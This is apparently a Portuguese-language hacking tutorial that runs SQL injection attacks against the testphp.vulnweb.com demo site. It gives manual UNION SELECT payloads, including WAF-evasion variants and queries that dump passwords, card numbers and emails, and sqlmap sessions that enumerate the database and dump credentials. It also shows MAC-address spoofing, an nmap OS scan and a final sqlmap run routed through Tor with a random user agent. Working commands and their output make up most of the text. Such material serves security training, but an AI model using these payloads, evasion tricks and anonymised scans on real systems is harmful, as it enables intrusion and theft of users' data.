union select 1,pass,cc FROM users WHERE uname='test'Vuln column:7
http://testphp.vulnweb.com/listproducts.php?cat=3
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
union all select1,2,3,4,5,6,'<< Coluna 7 esta vulneravel >>',8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
and 1 = 0 union select 1,2,3,4,5,6,version(),8,9,10,11-- -
Vuln columns:7 and 11
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,2,3,4,5,6,version(),8,9,10,user()
http://testphp.vulnweb.com/listproducts.php?cat=3
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/**//*!12345UNION SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/*--*/union/*--*/select/*--*/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4,5,6,7,8,9,10,11-- -
http://testphp.vulnweb.com/listproducts.php?cat=3
/**/union/*!50000select*//**/ 1,2,3,4,5,6,7,8,9,10,11-- -http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from
information_schema.columns where table_schema=database() and table_name='users'--+
http://testphp.vulnweb.com/listproducts.php?cat=-1
union all select 1,group_concat('User : ',uname,' Password: ',pass,
' Phone: ',cc,' Email: ',email),3,4,5,6,7,8,9,10,11 from users--+
http://testphp.vulnweb.com/listproducts.php?cat=-1union select 'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8',
'vuln9','vuln10','vuln11'
Vuln column: 1379
http://testphp.vulnweb.com/product.php?pic=-1
and 1 = 0 union select 1,'Vuln 2','Vuln 3',4,5,6,'Vuln 7',8,'Vuln 9',10,11--http://testphp.vulnweb.com/product.php?pic=-1
and 1 = 0 union select 1,version(),user(),4,5,6,'Vuln 7===',8,database(),10,11--http://testphp.vulnweb.com/artists.php?artist=100
union select 1,2,(select count(table_name) from information_schema.tables)
http://testphp.vulnweb.com/product.php?pic=-1
and 1 = 0 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11
FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 115)--
http://testphp.vulnweb.com/listproducts.php?cat=-1
union select 1,2,3,4,5,6,concat(uname,0x3a,pass,0x3a,email,0x3a,name),8,9,10,11
from users
08 - Kali Linux - Downloading and Installing
O kali Linux e um sistema operacional (OS) avançado com varias ferramentas para testes
de seguranças ( Teste de Penetração ), esses testes são feitos para descobrir falhas em
sistemas operacionais, redes, internet e vários outros... ele é totalmente baseado no
Debian, que é outro sistema operacional também derivado do linux.
Seu antecessor foi o BackTrack Linux. O Kali Linux foi o renascimento do Backtrack, o
novo Kali Linux veio com a proposta de ser a mais robusta, avançada e estável
distribuição para testes de invasão, disponibilizando mais de 300 ferramentas e um
kernel modificado, sendo também completamente customizável.
Vamos baixar o Kali para fazermos os exemplos de Injeção manual agora com a ferramenta
sqlmap do Kali.
https://www.kali.org/
https://www.kali.org/downloads/
Downloading Kali Linux image file ( iso )
Watch the step by step movie showing how to install Kali on your VirtualBox.
I have already shown the step by step installation of Linux Debian so it it exactly the
same way with Kali. :)
Username: root
Password: 123
Clique no icone no lado esquerdo para abrir o terminal.
Se preferir acessar o terminal via putty ou terminal do mac então precisaremos
iniciar o serviço do ssh.
service ssh start ( enter )
Se usar o terminal do Kali não precisaremos usar a linha acima.
ifconfig ( enter )
Atualizando o sistema.
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y ( enter )
Vamos inicar o servico do ssh para acessarmos via putty ou terminal mac.
service ssh start ( enter )
09 - Kali - Sqlmap
Agora vamos reproduzir o exemplo da "Injeção Manual de SQL" usando a ferramenta sqlmap
do Kali Linux.
SqlMap
O SQLMAP é uma ferramenta de injeção SQL desenvolvida em Python, seu objetivo é
detectar e explorar vulnerabilidades de injeção SQL em aplicações ou sites web, uma
vez que se detecta uma ou mais injeções de SQL em um alvo, o usuário pode escolher
entre uma variedade de opções que o SQLMAP disponibiliza para explorar os dados
armazenados dentro do banco de dados deste sistema ou site, tais como, extrair a lista
de usuários, senhas, privilégios, tabelas e muito mais..
----------------------------------------------
Lei 12.737/2012 no Art. 154-AInvadir dispositivo informático alheio, conectado ou não à rede de computadores,
mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar
ou destruir dados ou informações sem autorização expressa ou tácita do titular do
dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:
Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.
Lei Nº 12.737, de 30 de novembro de 2012.
----------------------------------------------
No terminal no Kali digite os comandos abaixo para mudar o mac address.
ifconfig eth0 down macchanger -m 02:33:4A:B5:6C:D7 eth0
Permanent MAC: e8:94:f6:1c:0e:8b (unknown)
Current MAC: 02:33:4a:b5:6c:e7 (unknown)
New MAC: 02:33:4a:b5:6c:d7 (unknown)
ifconfig eth0 up
Na prática...
----------------------------------------------
Vamos vamos usar o ferramenta do Kali Linux chamada de sqlmap para acharmos as
vulnerabilidades de injeção de sql.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program
[*] starting at 21:25:44
[21:25:45] [INFO] testing connection to the target URL
[21:25:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:25:46] [INFO] testing if the target URL is stable
[21:25:47] [INFO] target URL is stable
[21:25:47] [INFO] testing if GET parameter 'artist' is dynamic
[21:25:47] [INFO] confirming that GET parameter 'artist' is dynamic
[21:25:48] [INFO] GET parameter 'artist' is dynamic
[21:25:48] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[21:25:48] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] y
[21:25:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:26:02] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[21:26:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:26:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (UPDATEXML)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (EXP)'
[21:26:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING,
ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:26:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[21:26:06] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[21:26:06] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:26:07] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:26:09] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[21:26:10] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[21:26:11] [INFO] testing 'MySQL inline queries'
[21:26:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:26:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:26:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[21:26:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:26:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[21:26:24] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[21:26:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:26:24] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[21:26:26] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns.
Automatically extending the range for current UNION query injection technique test
[21:26:27] [INFO] target URL appears to have 3 columns in query
[21:26:33] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title:MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f467445594851666976445952435075617
06e624d42526f597a73,0x7171786271)-- -
---
[21:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:26:43] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 21:26:43
----------------------------------------------
Vamos listar os bancos de dados.
--dbs = lista bancos de dados
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 21:59:28
[21:59:28] [INFO] resuming back-end DBMS 'mysql'
[21:59:29] [INFO] testing connection to the target URL
[21:59:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[21:59:30] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[21:59:30] [INFO] fetching database names
[21:59:30] [INFO] the SQL query used returns 2 entries
[21:59:30] [INFO] resumed: information_schema
[21:59:30] [INFO] resumed: acuart
available databases [2]:
[*] acuart
[*] information_schema
[21:59:30] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 21:59:30
----------------------------------------------
-D = acuart ( banco de dados )
--tables = lista tabelas
----------------------------------------------
Listando todas as tabelas do banco de dados acuart.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 22:02:11
[22:02:11] [INFO] resuming back-end DBMS 'mysql'
[22:02:11] [INFO] testing connection to the target URL
[22:02:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:02:15] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:02:15] [INFO] fetching tables for database: 'acuart'
[22:02:15] [INFO] the SQL query used returns 8 entries
[22:02:15] [INFO] resumed: artists
[22:02:15] [INFO] resumed: carts
[22:02:15] [INFO] resumed: categ
[22:02:15] [INFO] resumed: featured
[22:02:15] [INFO] resumed: guestbook
[22:02:15] [INFO] resumed: pictures
[22:02:15] [INFO] resumed: products
[22:02:15] [INFO] resumed: users
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
[22:02:15] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:02:15
----------------------------------------------
Listando todas as tabelas e campos do banco de dados acuart.
--tables = lista tabelas
--columns = lista colunas
----------------------------------------------
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --columns
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 22:15:25
[22:15:25] [INFO] resuming back-end DBMS 'mysql'
[22:15:25] [INFO] testing connection to the target URL
[22:15:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:15:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:15:27] [INFO] fetching tables for database: 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: artists
[22:15:27] [INFO] resumed: carts
[22:15:27] [INFO] resumed: categ
[22:15:27] [INFO] resumed: featured
[22:15:27] [INFO] resumed: guestbook
[22:15:27] [INFO] resumed: pictures
[22:15:27] [INFO] resumed: products
[22:15:27] [INFO] resumed: users
Database: acuart[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
[22:15:27] [INFO] fetching columns for table 'artists' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "artist_id","int(5)"
[22:15:27] [INFO] resumed: "aname","varchar(50)"
[22:15:27] [INFO] resumed: "adesc","text"
[22:15:27] [INFO] fetching columns for table 'carts' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cart_id","varchar(100)"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "item","int(11)"
[22:15:27] [INFO] fetching columns for table 'categ' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "cat_id","int(5)"
[22:15:27] [INFO] resumed: "cname","varchar(50)"
[22:15:27] [INFO] resumed: "cdesc","tinytext"
[22:15:27] [INFO] fetching columns for table 'featured' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 2 entries
[22:15:27] [INFO] resumed: "pic_id","int(11)"
[22:15:27] [INFO] resumed: "feature_text","text"
[22:15:27] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 3 entries
[22:15:27] [INFO] resumed: "sender","varchar(150)"
[22:15:27] [INFO] resumed: "mesaj","text"
[22:15:27] [INFO] resumed: "senttime","int(32)"
[22:15:27] [INFO] fetching columns for table 'pictures' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "pic_id","int(5)"
[22:15:27] [INFO] resumed: "pshort","mediumtext"
[22:15:27] [INFO] resumed: "plong","text"
[22:15:27] [INFO] resumed: "price","int(11)"
[22:15:27] [INFO] resumed: "cat_id","int(11)"
[22:15:27] [INFO] resumed: "a_id","int(11)"
[22:15:27] [INFO] resumed: "title","varchar(100)"
[22:15:27] [INFO] resumed: "img","varchar(50)"
[22:15:27] [INFO] fetching columns for table 'products' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 5 entries
[22:15:27] [INFO] resumed: "id","int(10) unsigned"
[22:15:27] [INFO] resumed: "name","text"
[22:15:27] [INFO] resumed: "rewritename","text"
[22:15:27] [INFO] resumed: "description","text"
[22:15:27] [INFO] resumed: "price","int(10) unsigned"
[22:15:27] [INFO] fetching columns for table 'users' in database 'acuart'
[22:15:27] [INFO] the SQL query used returns 8 entries
[22:15:27] [INFO] resumed: "uname","varchar(100)"
[22:15:27] [INFO] resumed: "pass","varchar(100)"
[22:15:27] [INFO] resumed: "cc","varchar(100)"
[22:15:27] [INFO] resumed: "address","mediumtext"
[22:15:27] [INFO] resumed: "email","varchar(100)"
[22:15:27] [INFO] resumed: "name","varchar(100)"
[22:15:27] [INFO] resumed: "phone","varchar(100)"
[22:15:27] [INFO] resumed: "cart","varchar(100)"
Database: acuart
Table: categ[3 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| cat_id | int(5) |
| cdesc | tinytext |
| cname | varchar(50) |
+--------+-------------+
Database: acuart
Table: users[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
Database: acuart
Table: carts[3 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| cart_id | varchar(100) |
| item | int(11) |
| price | int(11) |
+---------+--------------+
Database: acuart
Table: pictures[8 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| a_id | int(11) |
| cat_id | int(11) |
| img | varchar(50) |
| pic_id | int(5) |
| plong | text |
| price | int(11) |
| pshort | mediumtext |
| title | varchar(100) |
+--------+--------------+
Database: acuart
Table: featured[2 columns]
+--------------+---------+
| Column | Type |
+--------------+---------+
| feature_text | text |
| pic_id | int(11) |
+--------------+---------+
Database: acuart
Table: products[5 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| description | text |
| id | int(10) unsigned |
| name | text |
| price | int(10) unsigned |
| rewritename | text |
+-------------+------------------+
Database: acuart
Table: artists[3 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| adesc | text |
| aname | varchar(50) |
| artist_id | int(5) |
+-----------+-------------+
Database: acuart
Table: guestbook[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| mesaj | text |
| sender | varchar(150) |
| senttime | int(32) |
+----------+--------------+
[22:15:27] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:15:27
----------------------------------------------
Listando o conteúdo dos dois campos, uname and pass ( username e password ) :)
-D acuart = banco de dados
-T users = tabela ( de usuarios )
-C uname,pass = listara os 2 campos ( usuario e senha )
--dump = mostra os dados
----------------------------------------------
Digite o comando abaixo em uma única linha.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
-D acuart -T users -C uname,pass --dump
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 22:26:26
[22:26:26] [INFO] resuming back-end DBMS 'mysql'
[22:26:26] [INFO] testing connection to the target URL
[22:26:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:26:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:26:27] [INFO] fetching entries of column(s) 'pass, uname' for table 'users'
in database 'acuart'
[22:26:27] [INFO] the SQL query used returns 1 entries
[22:26:27] [INFO] retrieved: "test","test"
[22:26:27] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test | test |
+-------+------+
[22:26:27] [INFO] table 'acuart.users' dumped to CSV file
'/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[22:26:27] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:26:27
----------------------------------------------
Veja acima o usuário e a senha purto texto super secreta... :)
Abaixo vamos testar o acesso no site...
Acessando os dados...
----------------------------------------------
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 22:43:27
[22:43:27] [INFO] resuming back-end DBMS 'mysql'
[22:43:27] [INFO] testing connection to the target URL
[22:43:28] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:43:28] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:43:28] [INFO] fetching current user
current user:'acuart@localhost'
[22:43:28] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:43:28
----------------------------------------------
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --users
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201601040a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 22:45:09
[22:45:10] [INFO] resuming back-end DBMS 'mysql'
[22:45:10] [INFO] testing connection to the target URL
[22:45:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5701=5701
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))nzIE)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9846 UNION ALL SELECT NULL,NULL,CONCAT(0x7178706271,
0x574756745364796459485666754f46744559485166697644595243507561706e624d42526f597a73,
0x7171786271)-- -
---
[22:45:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[22:45:11] [INFO] fetching database users
[22:45:11] [INFO] the SQL query used returns 1 entries
[22:45:11] [INFO] retrieved: 'acuart'@'localhost'
database management system users [1]:
[*] 'acuart'@'localhost'
[22:45:11] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 22:45:11
----------------------------------------------
Verificando portas abertas.
nmap -sS -P0 -sV -O testphp.vulnweb.com
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-06-12 22:57 EDT
Nmap scan report for testphp.vulnweb.com (176.28.50.165)
Host is up (0.25s latency).
rDNS record for 176.28.50.165: rs202995.rs.hosteurope.de
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3e
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7.1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND none
80/tcp open http nginx 1.4.1
106/tcp open pop3pw poppassd
110/tcp open pop3 Courier pop3d
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap Plesk Courier imapd
445/tcp filtered microsoft-ds
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap Plesk Courier imapd
995/tcp open ssl/pop3 Courier pop3d
8443/tcp open http lighttpd
Aggressive OS guesses: Linux 2.6.32 (89%), QNAP NAS Firmware 3.8.3 (Linux 3.X) (87%),
IPFire firewall 2.11 (Linux 2.6.32) (87%), D-Link DSL-2890AL ADSL router (87%),
IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), OpenWrt Kamikaze 8.09
(Linux 2.6.25.20) (87%), Linux 2.6.36 (87%), Linux 3.2.1 (86%), Linux 2.6.35 (86%),
Check Point ZoneAlarm Z100G firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts: rs202995.rs.hosteurope.de, localhost.localdomain; OSs: Unix,
Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.11 seconds
----------------------------------------------
*** Digite o comando abaixo em um única linha:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--dbs --time-sec=3 --threads=3 --technique=BEUS --random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 12:15:09
